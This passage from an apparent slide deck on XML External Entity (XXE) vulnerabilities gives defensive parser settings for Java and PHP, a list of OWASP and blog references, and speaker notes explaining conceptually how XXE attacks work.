  • 12. Fixes – JAVA • Disable DTDs • If it is not possible to disable DTDs completely, then • Disable external entity • Disable external DTDs factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities" , false); factory.setFeature(“http://apache.org/xml/features/nonvalidating/load-external-dtd” , false);
  • 13. Fixes - PHP • libxml_disable_entity_loader(true); • Refer - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Chea t_Sheet#PHP Fixes – iOS, .NET, C/C++
  • 14. References • DTD tutorial http://edutechwiki.unige.ch/en/DTD_tutorial • XML External Entity (XXE) Processing https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing • XML External Entity (XXE) Prevention Cheat Sheet https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP • Scanning the internal network using SimpleXML http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html • Identifying Xml eXternal Entity vulnerability (XXE) https://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/

Editor's Notes

  1. An XML External Entity attack is a type of attack against an application that parses XML input This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser
  2. The system identifier is assumed to be a URI that can be dereferenced by the XML processor when processing the entity XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information
  3. This extension allows to interact with processes through PTY.